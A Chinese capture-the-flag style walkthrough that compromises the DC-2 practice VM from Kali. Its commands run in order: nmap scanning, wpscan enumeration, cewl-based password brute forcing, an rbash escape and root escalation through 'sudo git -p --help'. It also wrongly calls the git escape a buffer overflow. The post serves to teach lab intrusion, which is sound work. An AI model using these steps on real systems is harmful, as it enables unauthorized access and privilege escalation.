[渗透测试][Kali]对DC-2靶机进行渗透测试
对DC-2靶机进行渗透测试
1.搭建渗透平台
2.准备工作
3.扫描端口
4.使用wpscan进一步扫描
5.破解密码
6.登陆ssh
7.root权限提升
1.搭建渗透平台
Kali 2018, DC-2靶机, VMWare虚拟机平台
平台搭建工作不再赘述
2.准备工作
使用nmap扫描局域网中的主机
Bash shell命令
nmap -sn 192.168.11.0/24
Bash shell输出
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 10:37 CST
Nmap scan report for 192.168.11.1
Host is up (0.00021s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.11.2
Host is up (0.00016s latency).
MAC Address: 00:50:56:F3:D4:1F (VMware)
Nmap scan report for dc-2 (192.168.11.129)
Host is up (0.00017s latency).
MAC Address: 00:0C:29:52:22:87 (VMware)
Nmap scan report for 192.168.11.254
Host is up (0.000052s latency).
MAC Address: 00:50:56:EA:98:00 (VMware)
Nmap scan report for 192.168.11.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.07 seconds
这里扫描出的192.168.11.1是我的物理机地址(虚拟机网络采用NAT),192.168.11.2是DHCP服务器,192.168.11.128是kali本机地址,192.168.129和192.168.11.254中的一个就是DC-2靶机。
3.扫描端口
分别对这两个地址进一步扫描,在扫描192.168.11.129时发现了如下结果
Bash shell命令
nmap -p- -A -v 192.168.11.129
Bash shell输出(部分)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 11:16 CST
Nmap scan report for 192.168.11.129
Host is up (0.00036s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
该机器的80端口是打开的,并且部署了apache服务器,7744开启了SSH服务,可以确定这台机器就是DC-2靶机,尝试直接用浏览器访问,结果被重定向到了一个域名dc-2/,我们返回去查看扫描结果,看到http头里面提示我们没有用域名http://dc-2/访问;于是确认该主机必须使用域名访问,在host文件中添加静态条目之后可以用浏览器打开网页。发现是一个wordpress网站,考虑使用wpscan。在网站下面有一个flag1,提示我们要用cewl这个软件。
4.使用wpscan进一步扫描
Bash shell命令
wpscan –-url dc-2 #默认扫描
wpscan --url dc-2 -eu #扫描用户名
可以扫描出一些信息,我们发现其默认的后台登陆页面(/wp-login.php)可以正常访问,进一步扫描用户。
Bash shell输出(部分)
[+] admin| Detected By: Rss Generator (Passive Detection)| Confirmed By:| Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Login Error Messages (Aggressive Detection)[+] tom| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] jerry| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)
发现了3个用户,这时候就要用上提示我们的cewl,它是一个社会工程学爬虫,可以从http页面爬取信息生成密码字典,然后再用wpscan爆破密码。
5.破解密码
Bash shell命令
cewl dc-2/ -w dict.txt #-w选项表示将爬取生成的字典输出为文件
wpscan –-url dc-2/ -P dict.txt #使用字典dict.txt破解所有用户密码
Bash shell输出(部分)
[i] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
可以看到jerry和tom的密码都被查出,这时候使用浏览器登陆这两个用户查看有没有可以利用的信息。在Jerry的账户里发现了下一条提示:flag2。
于是再看看tom的账户。没有什么有价值的信息。这时候需要换一种思路了,之前在使用nmap工具扫描这个主机的时候,还在7744端口开放了ssh服务。
6.登陆ssh
我们尝试使用上面两个账户来登陆ssh。首先尝试tom的账户,可以登陆,ls一下可以看到flag3。但是登陆使用的shell是rBash,功能受到严重限制以至于cat命令都无法使用,所以需要想办法绕过限制。我们先尝试把shell切换为/bin/sh,成功了。继续尝试使用cat来查看flag3中的内容,提示不能找到命令,这时候原因应该是没有将cat命令的目录添加到$PATH中,于是添加之。然后使用cat查看flag3.txt中的内容。
rBash和sh shell命令
ssh tom@dc-2 -p 7744 #建立ssh连接
cat flag3.txt
BASH_CMDS[a]=/bin/sh;a #切换shell
export PATH=$PATH:/bin/ #添加$PATH,cat和su都在/bin下
export PATH=$PATH:/usr/bin #sudo在/usr/bin下
cat flag3.txt
Bash shell输出(flag3.txt的内容)
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
看了flag3.txt之后,使用su jerry切换为jerry登陆。切换到jerry的用户目录,flag4出现了,cat一下。
Bash shell输出(flag4.txt的内容)
Good to see that you've made it this far - but you're not home yet. You still need to get the final flag (the only flag that really counts!!!). No hints here - you're on your own now. :-)Go on - git outta here!!!!
7.root权限提升
flag4告诉我们只差最后一步了,并且最后一步要用到git。这里说明一下,git有一个缓冲区溢出漏洞,在使用sudo git -p --help时,不需要输入root密码即可以root权限执行这条命令。我们尽量减小缓冲区的行数,使其一次性显示不完这条命令的回显结果,这样这条命令就一直处于运行状态,加上此时处于root权限,我们直接在这时候打开bash shell,直接提权至root。
Bash shell命令
sudo git -p –help
!/bin/bash
至此,命令提示符变为root@DC-2:/home/tom#,已经完成root权限获取。
[渗透测试][Kali]对DC-2靶机进行渗透测试相关推荐
- 【CyberSecurityLearning 74】DC系列之DC-5渗透测试
目录 DC系列之DC-5渗透测试 实验环境: 实验步骤: 1.主机扫描,确定目标主机IP 2.对DC-5进行端口扫描 3.访问DC-5的web服务,了解相关信息 4.使用wfuzz测试页面参数 5.看 ...
- DC系列漏洞靶场-渗透测试学习复现(DC-1)
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们 ...
- 【CyberSecurityLearning 72】DC系列之DC-3渗透测试(Joomla)
目录 DC-3靶机渗透测试 一.实验环境 二.渗透过程演示 1.信息搜集 2.SQL注入 3.登录后台 4.反弹shell 5.提权 总结: DC-3靶机渗透测试 DC-3也是一个黑盒测试,我们所能知 ...
- 网络安全-渗透测试-Kali Linux教程篇 篇(六) 漏洞分析-02——AppScan-轻量级Web漏洞扫描、安全审计工具
本文目录 关于本篇 声明 正文 AppScan 安装教程 使用教程 Web Application Scan 关于本篇 本篇是网络安全-渗透测试-Kali Linux教程篇 第六篇 漏洞分析部分的第二 ...
- Mission-Pumpkin v1.0: PumpkinGarden(南瓜花园)靶机的渗透测试
描述 Mission-Pumpkin v1.0是初学者级别的CTF系列.该CTF系列适用于对黑客工具和技术具有基本知识,但又难以应用已知工具的人们.南瓜花园是Mission-Pumpkin v1.0下 ...
- 渗透测试-Kali虚拟机技术
系统简介 虚拟机 Kali Kali是一套用于安全渗透的Linux发行版虚拟机操作系统 ,其强大之处在于系统内置了大量的安全渗透方面的软件(预装超过300个渗透测试工具),新手可以免于配置,开箱即用! ...
- 【渗透测试】ew代理三层靶机穿透+proxifier配置规则
环境搭建: kali攻击机ip:10.177.228.200 新增一个桥接的网卡: vim /etc/network/interfacesauto enth1 iface eth1 inet stat ...
- 渗透测试-Kali入侵Win7主机
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径. 本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的 Win 7主机,从而 ...
- DC系列靶机DC-1
1,主机发现 1),nmap -sP 192.168.44.0/24 对当前网段内存活的主机进行扫描. 2),主机发现也可以使用 netdiscover -i eth0 -r 192.168.44.0 ...
最新文章
- Newtonsoft.Json.dll 本地调用正常,服务器调用不正常
- 内置对象—request
- java.lang.NullPointerException: Attempt to invoke virtual method 'int java.lang.Integer.intValue()'
- OpenStack构架知识梳理
- MyBatis 3 – Spring集成教程
- org-mode入门教程
- 信息学奥赛一本通 2005:【20CSPJ普及组】直播获奖 | 洛谷 P7072 [CSP-J2020] 直播获奖
- jsp页面获取系统的日期时间
- 机器人枪杀人类的时刻到了
- php怎么获取cid,Typecho根据文章cid获取文章信息
- ipad2 白苹果惊魂
- 图论及其应用 2016年 期末考试 答案总结
- ios定位权限plist_[译] iOS 请求定位权限
- php记录sql语句,sql语句记录
- EditText相关设置
- PCB布局布线技巧总结
- android邮箱附件传输,Android上发送带附件的邮件
- 迅为嵌入式linux驱动开发笔记(十一)—触摸屏驱动
- 一站式社区智慧路灯系统集成解决方案解析
- wpsppt加载项在哪里_wpsppt加载项在哪里_《wps表格加载项在哪里》 WPS版的EXCEL中 加载宏和数据分析在哪?......